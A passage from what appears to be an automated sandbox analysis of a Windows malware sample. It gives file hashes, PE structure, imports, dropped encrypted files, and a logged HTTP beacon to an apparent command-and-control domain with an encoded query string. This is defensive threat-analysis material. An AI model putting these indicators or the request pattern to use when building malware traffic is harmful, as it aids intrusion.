                                        SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\Lityerses

                                        Download File
                                        Process:C:\Users\user\Desktop\Gz2FxKx2cM.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):287232
                                        Entropy (8bit):7.996087003661156
                                        Encrypted:true
                                        SSDEEP:6144:mc0Gsj26YmWr3in6rJNTLe505hNSHlc1x3qqYAslQV:mwspWr33V5hNSoqqY1iV
                                        MD5:51E59B61B3770AFF8E2491C74F537A7C
                                        SHA1:DE27E6BBA6939794BBAE5D78C4FE7024102FC4E0
                                        SHA-256:BE01C0DF655404CC17A3D83B3CE0205A934354C5170C09BD6F9A2239905947EF
                                        SHA-512:DD6DF636B49E2E0B383730BF118FB233A63E8D3C994B8529413807D190A0605C05704104B314F3A8406CF0F23D5DF9BD3013EB0598088BDBA6ECBE8CC3300CAF
                                        Malicious:false
                                        Reputation:low
                                        Preview:...SWXIV^M29..6S.0410LKPxZ7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTX.VZM<&.K6.0...1..ql2^5o*!;?;77mQX/+Y'.RQ.B9%pQ4....s97-3t@?3eE6S9041IMB..:P.r:4.e)1.W....V4.*...p+7.@..f33..?9%.Y&.6S90410L..8Z{GNZ.|.)VZM29AE6.925:1GKPh^7FOZSTXIV.Y29AU6S9P010L.P8J7FOXST^IVZM29AC6S90410L+T8Z5FOZSTXKV..29QE6C9041 LK@8Z7FOZCTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7h;?+ XIV..69AU6S9`010\KP8Z7FOZSTXIVZm29!E6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7F

                                        C:\Users\user\AppData\Local\Temp\aut8F8B.tmp

                                        Download File
                                        Process:C:\Users\user\Desktop\Gz2FxKx2cM.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):287232
                                        Entropy (8bit):7.996087003661156
                                        Encrypted:true
                                        SSDEEP:6144:mc0Gsj26YmWr3in6rJNTLe505hNSHlc1x3qqYAslQV:mwspWr33V5hNSoqqY1iV
                                        MD5:51E59B61B3770AFF8E2491C74F537A7C
                                        SHA1:DE27E6BBA6939794BBAE5D78C4FE7024102FC4E0
                                        SHA-256:BE01C0DF655404CC17A3D83B3CE0205A934354C5170C09BD6F9A2239905947EF
                                        SHA-512:DD6DF636B49E2E0B383730BF118FB233A63E8D3C994B8529413807D190A0605C05704104B314F3A8406CF0F23D5DF9BD3013EB0598088BDBA6ECBE8CC3300CAF
                                        Malicious:false
                                        Preview:...SWXIV^M29..6S.0410LKPxZ7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTX.VZM<&.K6.0...1..ql2^5o*!;?;77mQX/+Y'.RQ.B9%pQ4....s97-3t@?3eE6S9041IMB..:P.r:4.e)1.W....V4.*...p+7.@..f33..?9%.Y&.6S90410L..8Z{GNZ.|.)VZM29AE6.925:1GKPh^7FOZSTXIV.Y29AU6S9P010L.P8J7FOXST^IVZM29AC6S90410L+T8Z5FOZSTXKV..29QE6C9041 LK@8Z7FOZCTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7h;?+ XIV..69AU6S9`010\KP8Z7FOZSTXIVZm29!E6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7F

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.194135370422717
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:Gz2FxKx2cM.exe
                                        File size:1'211'904 bytes
                                        MD5:f0483efd3c238f3181609c3aa40fdac6
                                        SHA1:9a5fa8d3e90ef6de9ef7117f87a9eabcb39d1189
                                        SHA256:f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a
                                        SHA512:c706f5f258c3b915d5f36e4d08f926334fbf70813a786bbb08afc246aeafdbaaff92ab4a7a60e9acec3ee7079bdb6f0fe437b424aa54229916ca6734e398f3f9
                                        SSDEEP:24576:1u6J33O0c+JY5UZ+XC0kGso6Faj8tIty5lJ8z0YE/zdL8qWY:Xu0c++OCvkGs9FajcIty5lqI5/zp8Y
                                        TLSH:A345CF2273DDC370CB669173BF69B7056EBF38614630B95B2F880D7DA950162262C7A3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                        File Icon

                                        Icon Hash:aaf3e3e3938382a0

                                        Static PE Info

                                        General

                                        Entrypoint:0x427dcd
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x675642A7 [Mon Dec 9 01:06:47 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F35888ECD3Ah
                                        jmp 00007F35888DFB04h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F35888DFC8Ah
                                        cmp edi, eax
                                        jc 00007F35888DFFEEh
                                        bt dword ptr [004C31FCh], 01h
                                        jnc 00007F35888DFC89h
                                        rep movsb
                                        jmp 00007F35888DFF9Ch
                                        cmp ecx, 00000080h
                                        jc 00007F35888DFE54h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F35888DFC90h
                                        bt dword ptr [004BE324h], 01h
                                        jc 00007F35888E0160h
                                        bt dword ptr [004C31FCh], 00000000h
                                        jnc 00007F35888DFE2Dh
                                        test edi, 00000003h
                                        jne 00007F35888DFE3Eh
                                        test esi, 00000003h
                                        jne 00007F35888DFE1Dh
                                        bt edi, 02h
                                        jnc 00007F35888DFC8Fh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F35888DFC93h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F35888DFCE5h
                                        bt esi, 03h
                                        jnc 00007F35888DFD38h

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD4 build 31101
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD4 build 31101

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5f5e8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x711c.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xc70000x5f5e80x5f60032f3bc4089fcd6942cfd4454a158a03fFalse0.9315331135321101data7.901033683107946IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1270000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                        RT_RCDATA0xcf7b80x568addata1.0003272426701872
                                        RT_GROUP_ICON0x1260680x76dataEnglishGreat Britain0.6610169491525424
                                        RT_GROUP_ICON0x1260e00x14dataEnglishGreat Britain1.25
                                        RT_GROUP_ICON0x1260f40x14dataEnglishGreat Britain1.15
                                        RT_GROUP_ICON0x1261080x14dataEnglishGreat Britain1.25
                                        RT_VERSION0x12611c0xdcdataEnglishGreat Britain0.6181818181818182
                                        RT_MANIFEST0x1261f80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                        Imports

                                        DLLImport
                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                        PSAPI.DLLGetProcessMemoryInfo
                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                        UxTheme.dllIsThemeActive
                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 10, 2025 23:58:02.169481039 CET4970980192.168.2.8104.21.36.62
                                        Jan 10, 2025 23:58:02.174387932 CET8049709104.21.36.62192.168.2.8
                                        Jan 10, 2025 23:58:02.174489975 CET4970980192.168.2.8104.21.36.62
                                        Jan 10, 2025 23:58:02.186089039 CET4970980192.168.2.8104.21.36.62
                                        Jan 10, 2025 23:58:02.190908909 CET8049709104.21.36.62192.168.2.8
                                        Jan 10, 2025 23:58:02.849024057 CET8049709104.21.36.62192.168.2.8
                                        Jan 10, 2025 23:58:02.849045992 CET8049709104.21.36.62192.168.2.8
                                        Jan 10, 2025 23:58:02.849203110 CET4970980192.168.2.8104.21.36.62
                                        Jan 10, 2025 23:58:02.849241972 CET8049709104.21.36.62192.168.2.8
                                        Jan 10, 2025 23:58:02.849284887 CET4970980192.168.2.8104.21.36.62
                                        Jan 10, 2025 23:58:02.852375031 CET4970980192.168.2.8104.21.36.62
                                        Jan 10, 2025 23:58:02.858319044 CET8049709104.21.36.62192.168.2.8

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 10, 2025 23:58:02.147236109 CET5373153192.168.2.81.1.1.1
                                        Jan 10, 2025 23:58:02.163851976 CET53537311.1.1.1192.168.2.8

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 10, 2025 23:58:02.147236109 CET192.168.2.81.1.1.10x7e64Standard query (0)www.izmirescortg.xyzA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 10, 2025 23:58:02.163851976 CET1.1.1.1192.168.2.80x7e64No error (0)www.izmirescortg.xyz104.21.36.62A (IP address)IN (0x0001)false
                                        Jan 10, 2025 23:58:02.163851976 CET1.1.1.1192.168.2.80x7e64No error (0)www.izmirescortg.xyz172.67.186.192A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.izmirescortg.xyz

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.849709104.21.36.62806844C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 10, 2025 23:58:02.186089039 CET377OUTGET /lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTX HTTP/1.1
                                        Accept: */*
                                        Accept-Language: en-US
                                        Connection: close
                                        Host: www.izmirescortg.xyz
                                        User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                        Jan 10, 2025 23:58:02.849024057 CET1236INHTTP/1.1 404 Not Found
                                        Date: Fri, 10 Jan 2025 22:58:02 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                        Pragma: no-cache
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jX%2Ftr0tYJK%2FVuPWsk1Rktd8%2Bi8Yl8lwFv%2BsNV5OydejmiqjzgIuv4kXEYkHtbAym5mkB9SsvlsE1%2F4hU4puZTfmlRAFPQt1A7Bz7sKleyfDteJcLCGu4UUtaBh%2F4lY3Ztv6gjHlXYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 900044fe2a950f80-EWR
                                        alt-svc: h3=":443"; ma=86400
